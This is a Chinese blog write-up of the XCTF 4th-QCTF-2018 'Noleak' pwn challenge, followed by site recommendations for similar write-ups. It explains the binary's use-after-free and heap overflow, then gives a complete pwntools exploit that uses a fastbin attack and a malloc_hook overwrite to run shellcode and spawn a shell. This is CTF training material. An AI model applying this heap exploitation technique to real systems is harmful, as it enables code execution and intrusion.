No leak XCTF 4th-QCTF-2018

最新推荐文章于 2022-04-02 17:48:41 发布
最新推荐文章于 2022-04-02 17:48:41 发布
阅读量676 收藏 1
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/97244932
版权

 这个题真的很好玩   先看一下保护

PIE 和 NX没开 那么我们可以 用shellcode 来写这一道题

先用ida 看一下题目

 

 会发现 没有show  也就是输出函数

但是 dele 函数确实能够 安排很多东西    UAF 等等

而且我们发现 edit 可以自己定size  那么 就可以堆溢出

但是有一点就是   

 

由于指针没有清0  如果我们不自己清0的话 可能直接就gg了  10个堆可能不太好利用,

然后我们可以用 fastbin attack  看看能不能 把我们地址上面的给写进去 我们向上找 看有没有合适的大小

 

这里发现一个合适的大小

然后可以 在搞一个unsorted bin  然后  在 libc -2.23 里面  malloc hook 和 放unsorted bin bk指针 最后一个字节不一样 我们把最后一个字节改了就可以了

然后再把 unsorted bin的大小给改了 指针改了 然后直接 让堆块申请到malloc hook的地方

然后修改成 我们shellcode 的地址就可以

 

from pwn import *

debug=1

context.log_level='debug'
context.arch='amd64'
shellcode=asm(shellcraft.sh()).ljust(0x73,'\x00')+'\x10'
if debug:
    io=process('./timu')
else:
    io=remote('',)

def add(size,data):
	io.recvuntil("Your choice :")
	io.sendline("1")
	io.recvuntil("Size: ")
	io.sendline(str(size))
	io.recvuntil("Data: ")
	io.sendline(data)

def dele(index):
	io.recvuntil("Your choice :")
	io.sendline("2")
	io.recvuntil("Index: ")
	io.sendline(str(index))

def edit(index,size,data):
	io.recvuntil("Your choice :")
	io.sendline("3")
	io.recvuntil("Index: ")
	io.sendline(str(index))
	io.recvuntil("Size: ")
	io.sendline(str(size))
	io.recvuntil("Data: ")
	io.sendline(data)

if __name__== "__main__":
	add(0x68,'0')
	add(0x68,'1')
	add(0x68,'2')
	dele(1)
	dele(0)
	edit(0,8,p64(0x600ff5))
	add(0x68,'3')
	add(0x68,'4')
	#gdb.attach(io)
	#pause()
	payload='\00'*0x5b
	edit(4,len(payload),payload)
	#gdb.attach(io)
	#pause()

	add(0x68,'0')
	add(0x68,'1')
	add(0x80,'2')
	add(0x68,'3')
	#gdb.attach(io)
	#pause()	
	dele(3)
	dele(0)
	dele(2)
	edit(0,1,'\x30')
	edit(2,1,'\x05')
	payload='\x00'*0x68+'\x71'
	edit(1,len(payload),payload)
	#gdb.attach(io)
	#pause()	
	add(0x68,'5')
	add(0x68,'6')
	add(0x68,'7')
	edit(4,len(shellcode),shellcode)
	edit(7,8,p64(0x601005))
	#gdb.attach(io)
	#pause()	
	#edit(2,)
	io.sendline('1')
	io.sendline('1')
	io.interactive()
	io.close()

 

pipixia233333
关注
专栏目录
攻防世界-PWN进阶区-Noleak(XCTF 4th-QCTF-2018)
weixin_44145820的博客
03-01 893
本题主要考察对堆的利用,需要有一定的背景知识,本文也参考了几篇大佬的Writeup,让本文尽可能详细。 题目分析 checksec: 本题的RELRO是完全开启的,意味着我们不能通过修改GOT表来进行攻击 以下是源代码: main函数 delete函数: 这里可以看到free之后没有把指针置空,可能有UAF或者Dubble Free edit函数: 在本函数中,没有检测大小就直接写入,明显...
Noleak(xctf)
weixin_43868725的博客
08-19 492
0x0 程序保护和流程 保护: 流程: main() create() delete() free之后没有将指针置空,存在UAF。 edit() 没有对输入数据的大小作出限制,存在堆溢出。 0x1 利用过程 1.题目中的got表不可写,又没有输出函数,无法泄露地址,但是堆栈上可以执行代码,所以需要一个可执行的指针变量指向shellcode的地址,才能够执行shellcode。 2.可以使用Unsorted bin attack改写buf中指向chunk的地址为main_arena的地址,之后通过u
[XCTF-pwn] 26_xctf-4th-QCTF-2018_noleak
weixin_52640415的博客
03-09 220
程序有add,edit,free没有show,pie未开,bss可写执行,有写溢出漏洞和UAF漏洞,unlink+fastbin attack,无需泄露地址。 解题思路: 先建0x28,0x80,0x10块,利用写溢出在释放1块时进行unlink控制指针区; 由于free时不清指针,且仅允许建9块,在控制指针区后清指针,保留控制指针的指针;并预留shellcode 建0x10,0x60,0x10在原unsort位置,释放0x60块后通过写溢出修改0x60的头为0x91再释放在0x60的fd位置得
XCTF 4th-QCTF-2018 dice_game
qq_43409582的博客
10-23 737
首先开一下保护除了canary什么都开了。。。 然后就打开ida分析: read函数造成了栈溢出漏洞。 继续审代码,发现是一个游戏。该程序首先让输入name,并且使用read来读入数据,故而此处存在栈溢出漏洞。下方看见程序使用seed、srand生成随机数。当我们猜对50次随机数时程序会调用sub_B28函数,从而得到flag. 这个随机数咋办呢,,有栈溢出漏洞可以利用,所以就想着能不能将seed...
XCTF-4th-QCTF-2018-babyrsa
MangoFengC++
03-17 630
题目 Baby RSA e = 0x10001 n = 0x0b765daa79117afe1a77da7ff8122872bbcbddb322bb078fe0786dc40c9033fadd639adc48c3f2627fb7cb59bb0658707fe516967464439bdec2d6479fa3745f57c0a5ca255812f0884978b2a8aaeb750e0228cbe28a1e5a63bf0309b32a577eecea66f7610a9a4e720649129e9dc2115d
Stack2 攻防世界题目分析
shanwei274的博客
04-18 1046
XCTF 4th-QCTF-2018 前言,怎么说呢,这题目还是把我折磨的可以的,我一开始是没有看到后面的直接狙击的,只能说呢。 我的不经意间的粗心,破坏了你许多的温柔 1.气的我直接检查保护: 32位程序,开启了canary保护。 2.ida查看: 首先放的第一幅图片呢,是我一开始以为可以溢出的,也可以看见我旁边标注了一个maybeoverflow。 但是是不可以的,因为首先由于这里的 i 最大上限100,可能有的人头铁就要说了,这里v7可以慢慢溢出去修改i,(和我一样) 可是这里v13的存储位
xpc-string-leak:CVE-2018-4248
05-02
漏洞:CVE-2018-4248 在macOS 10.13.5和iOS 11.4上,函数_xpc_string_deserialize在使用_xpc_string_create创建XPC字符串对象之前,不会验证反序列化的字符串的长度是否正确。 如果随后将XPC字符串序列化为另一个...
(Visual Leak Detector) vld-2.5.1-setup.exe.7z
12-29
Visual Leak Detector是一款用于Visual C++的免费的内存泄露检测工具。相比较其它的内存泄露检测工具,它在检测到内存泄漏的同时,还具有如下特点: 1、 可以得到内存泄漏点的调用堆栈,如果可以的话,还可以得到其...
WebRTC泄漏防止切换「WebRTC Leak Prevent Toggle」-crx插件
03-09
GitHub源代码 - https://github.com/aghorler/WebRTC-Leak-Prevent-Toggle CHANGELOG 1.0.11 - 选项现在在第一次安装时自动打开,新的描述。 1.0.10 - 更改GitHub用户名,修复很少。 1.0.9 - 进一步的遗留支持,错误...
Lotteryjs一个简单的JavaScript抽奖应用基于Zepto或jQuery
08-10
Lottery.js 一个简单的 JavaScript 抽奖应用,基于 Zepto 或 jQuery,快速便捷接入现有系统。
XCTF 4th-QCTF-2018——Noleak分析
Eagle_hwei的博客
02-14 616
Noleak的题目分析 2020-02-1321:52:33 by hawkJW 题目附件、ida文件及wp链接   这道题考察的比较综合,设置到方方面面的知识点,这里记录一下   1.  程序流程总览 首先,还是老规矩,看一下保护情况   可以看到,RELRO保护全开,则没有办法修改got表了,同时开启了Canary保护,栈溢出可能也有一定困难;但是我们看到,有NX没有开启,...
dice_game XCTF 4th-QCTF-2018
qq_41071646的博客
04-27 1089
其实感觉这个题 不算是pwn题。。。 这 pwn 里面就是 读取flag 文件 然后我们看一下 sub_a20 这个函数 随机数啊 本来我没有想用 把种子给 覆盖掉 但是 time(0) 感觉不稳 时间一万一不对劲 那么随机数 也会出错 所以干脆 把种子固定下来 下面是 exp #coding:utf-8 from pwn import* list...
在不知道libc的情况下getshell&&qctf_2018_noleak
azraelxuemo的博客
04-02 273
文章目录qctf_2018_noleak题目分析deleteeditcheckSec攻击思路考虑怎么把堆地址尽量靠近malloc_hook如何把main_arena地址写进去修改为malloc_hook修改malloc_hook为我们bss地址并填入shellcodegetshellallpayload 这个题也真是开了眼了,完全就不知道libc,但最后也是打出来了 qctf_2018_noleak qctf_2018_noleak 题目分析 delete 没有清空 edit 随便堆溢出 checkSe
攻防世界PWN之Noleak(一题学了好多知识)题解
seaaseesa的博客
11-13 3765
Noleak 本题需要用到的知识有:malloc_hook、unsorted bin unlink、fastbin attack、partial write bypass PIE 首先,介绍一下malloc_hook,这是C语言提供的一个用来包装malloc的,类似还有free_hook,具体可以查阅相关资料学习 Malloc hook 我们看如下代码 #include&...
攻防世界(pwn)Noleak
PLpa的博客
03-03 1577
前言: 看了大佬们的writeup,发现这题解法真的非常多,我这里用的是unsortedbin的地址写漏洞,详情可以看ctfwiki了解漏洞原因。 没开NX,有可以执行的堆栈,但是开启了Full RELRO,不能修改got表地址了。 打开IDA: 发现是一个菜单题,可以创建,删除,更新堆快信息,没有输出信息的选项,果然Noleak。 我们这里可以一个一个功能去看,看看漏洞存在哪里: 经过观察...
pwn CTF 4th-QCTF-2018 stack2
qq_41071646的博客
01-23 3443
先把程序跑一遍看看·~~~~~~~ 然后我们好像可以 加数还有 改变数   4功能好像还是 求平均数的 ~~~~ 看来功能还是很齐全的吗~~~~  然后我们 咦 这里的平均数为啥是  2.00呢 ~!~~~~  带着疑问去 看ida 这里好像没有什么毛病  限制了 输入的数量是99 然后往下看   这里就是bug了    因为我们没有检查v13数组的边界 这里我们可...
unsort bin attack -攻防世界 noleak
csdn546229768的博客
12-09 724
带着问题的学习是有效的 例题:攻防世界noleak ,这题解法好像有多种但是我是刚接触堆也是抱着学习的姿势学习攻击思路,这里就先例举我看明白的2种方式(爆破(在爆破__malloc_hook文章里面)、unsort bin攻击) 在ida分析后得到以下结果: 总结: 1.用于保存chunk指针的bss数组最多存储10个 2.free时有double free、uaf漏洞 3.可以编辑free chunk数据,有堆溢出漏洞 4.因为程序简单但是因为开了got不可写的措施导致题目有了很多玩法 没有开N
XCTF-pwn-stack2 - Writeup
菜小狗.的博客
11-28 563
偶尔在学习的阶段慢慢发现的进步 抽空写点笔记记录一下子 这次做的题目还是栈溢出漏洞的题目但是并没用用到payload,简单用了下ROP 题目描述 除了一个名称 stack2 题目描述是:暂无 下载附件运行一下看看流程 保护开启了nx 和canary 流程大概是提供了4个选项的功能:加数、改数还有求平均数啥的。 然后丢到iad里看一下这部分的流程简单分析一下漏洞点。 在这里看还是蛮正常的,...
valgrind 的leak-check
最新发布
09-14
leak-check是Valgrind的一个选项,用于检测内存泄漏。根据提供的引用内容,我们可以看到不同的leak-check选项被使用。 引用中使用的选项是`--leak-check=full`。这个选项会在程序结束时输出所有内存泄漏的详细信息...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值